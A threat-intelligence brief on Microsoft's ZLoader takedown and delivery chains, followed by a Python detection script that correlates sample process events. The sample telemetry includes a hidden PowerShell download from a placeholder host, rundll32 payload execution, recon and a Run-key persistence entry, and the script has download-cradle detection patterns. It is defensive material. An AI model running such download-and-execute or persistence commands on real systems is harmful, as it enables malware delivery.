2022-04-19

Microsoft Analyzes & Disrupts Zloader

Industry: N/A | Level: Tactical | Source: Microsoft

Microsoft, working with telecommunications providers, has taken down ZLoader infrastructure and published intelligence on the attack chains used to deliver the ZLoader payload. The first chain starts with an email carrying a malicious link or attachment that downloads the ZLoader payload. The second chain leverages Google Ads, popular advertising software tools, and compromised legitimate domains to stage malicious content on subdomains; a malicious MSI downloaded and executed by the victim then triggers PowerShell and scripts that download the ZLoader payload. Once the payload is dropped by either chain, the modular malware typically creates persistence, downloads additional payloads, or initiates enumeration to fulfill the attacker's objectives.

  • Anvilogic Scenario: ZLoader Attack Chain with Delivery from MSI or Malicious Doc
  • Anvilogic Use Cases:
      • Malicious Document Execution
      • MSIExec Install MSI File
      • Rundll32 Command Line
      • Common Reconnaissance Commands
      • Executable Create Script Process
      • Invoke-WebRequest Command
      • regsvr32 Execution
      • Wscript/Cscript Execution
      • New AutoRun Registry Key
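To make the attack chain and the use cases above concrete, the following is an added example (not Microsoft's or Anvilogic's detection content) that runs simplified versions of the listed use cases over a handful of constructed process-creation and registry events, then links the hits along the process tree so the MSI-to-PowerShell-to-download delivery chain surfaces as a single scenario. Event fields, the matching criteria, and every sample path and command line are assumptions made for the illustration.

```python
"""Detection walkthrough for the ZLoader MSI delivery chain (added example).

Constructed sample events are run through simplified versions of the use cases
listed on the page, then correlated by parent/child process id. Not Microsoft's
or Anvilogic's code; field names, criteria and sample data are assumptions.
"""
import re
from dataclasses import dataclass


@dataclass
class Event:
    kind: str            # "process" (creation) or "registry" (value set)
    pid: int = 0
    ppid: int = 0
    image: str = ""      # executable path of the new process
    cmdline: str = ""
    key: str = ""        # registry key path, for registry events


SCRIPT_HOSTS = {"wscript.exe", "cscript.exe", "powershell.exe", "pwsh.exe", "mshta.exe"}
DOC_APPS = {"winword.exe", "excel.exe", "outlook.exe"}
RECON = {"whoami", "net user", "net group", "ipconfig", "systeminfo", "nltest", "tasklist"}
AUTORUN = ("\\currentversion\\run", "\\currentversion\\runonce")
DOWNLOAD_RE = re.compile(r"invoke-webrequest|\biwr\b|downloadstring|downloadfile|net\.webclient", re.I)


def basename(path: str) -> str:
    """Lower-cased file name from a Windows path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def classify(ev: Event, parent_image: str) -> list:
    """Names of the listed use cases that one event satisfies (simplified criteria)."""
    hits = []
    if ev.kind == "registry":
        if any(k in ev.key.lower() for k in AUTORUN):
            hits.append("New AutoRun Registry Key")
        return hits
    img, par, cmd = basename(ev.image), basename(parent_image), ev.cmdline.lower()
    if img == "msiexec.exe" and ".msi" in cmd and re.search(r"/i\b|/package", cmd):
        hits.append("MSIExec Install MSI File")
    if par in DOC_APPS and (img in SCRIPT_HOSTS or img in {"cmd.exe", "msiexec.exe"}):
        hits.append("Malicious Document Execution")
    if img in SCRIPT_HOSTS and par not in SCRIPT_HOSTS | {"explorer.exe", "cmd.exe", ""}:
        hits.append("Executable Create Script Process")
    if img in {"powershell.exe", "pwsh.exe"} and DOWNLOAD_RE.search(cmd):
        hits.append("Invoke-WebRequest Command")
    if img == "rundll32.exe":
        hits.append("Rundll32 Command Line")
    if img == "regsvr32.exe":
        hits.append("regsvr32 Execution")
    if img in {"wscript.exe", "cscript.exe"}:
        hits.append("Wscript/Cscript Execution")
    if any(r in cmd for r in RECON):
        hits.append("Common Reconnaissance Commands")
    return hits


def analyze(events: list) -> dict:
    """Per-event use-case hits, plus the delivery scenario found by walking the
    process tree upward from each download command to an MSI or document ancestor."""
    procs = {e.pid: e for e in events if e.kind == "process"}
    use_cases, scenario = {}, []
    for ev in events:
        parent = procs.get(ev.ppid)
        hits = classify(ev, parent.image if parent else "")
        if hits:
            use_cases[ev.pid if ev.kind == "process" else ev.key] = hits
    for ev in events:
        if ev.kind == "process" and "Invoke-WebRequest Command" in use_cases.get(ev.pid, []):
            chain, cur = [basename(ev.image)], procs.get(ev.ppid)
            while cur:                      # collect the ancestry up to the root
                chain.insert(0, basename(cur.image))
                cur = procs.get(cur.ppid)
            if any(c in DOC_APPS or c == "msiexec.exe" for c in chain):
                scenario.append(" > ".join(chain))
    return {"use_cases": use_cases, "scenario": scenario}


# Constructed sample telemetry (not real events); paths and hosts are placeholders.
SAMPLE = [
    Event("process", pid=100, ppid=1, image=r"C:\Windows\explorer.exe", cmdline="explorer.exe"),
    Event("process", pid=200, ppid=100, image=r"C:\Windows\System32\msiexec.exe",
          cmdline=r"msiexec.exe /i C:\Users\u\Downloads\setup.msi /qn"),
    Event("process", pid=300, ppid=200, image=r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
          cmdline=r"powershell.exe -nop -w hidden Invoke-WebRequest http://example.invalid/p -OutFile C:\Users\Public\p.dll"),
    Event("process", pid=400, ppid=300, image=r"C:\Windows\System32\rundll32.exe",
          cmdline=r"rundll32.exe C:\Users\Public\p.dll,EntryPoint"),
    Event("process", pid=500, ppid=400, image=r"C:\Windows\System32\cmd.exe", cmdline="cmd.exe /c whoami"),
    Event("registry", key=r"HKCU\Software\Microsoft\Windows\CurrentVersion\Run\Updater"),
    Event("process", pid=600, ppid=100, image=r"C:\Windows\System32\notepad.exe", cmdline="notepad.exe"),
]

if __name__ == "__main__":
    for k, v in analyze(SAMPLE)["use_cases"].items():
        print(k, v)
    print("scenario:", analyze(SAMPLE)["scenario"])
```

The per-event checks are deliberately loose (any rundll32 or script-host launch fires), which is why the scenario correlation matters: individually noisy use cases become a high-confidence alert only when they line up along one process tree from msiexec or an Office application down to a PowerShell download.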
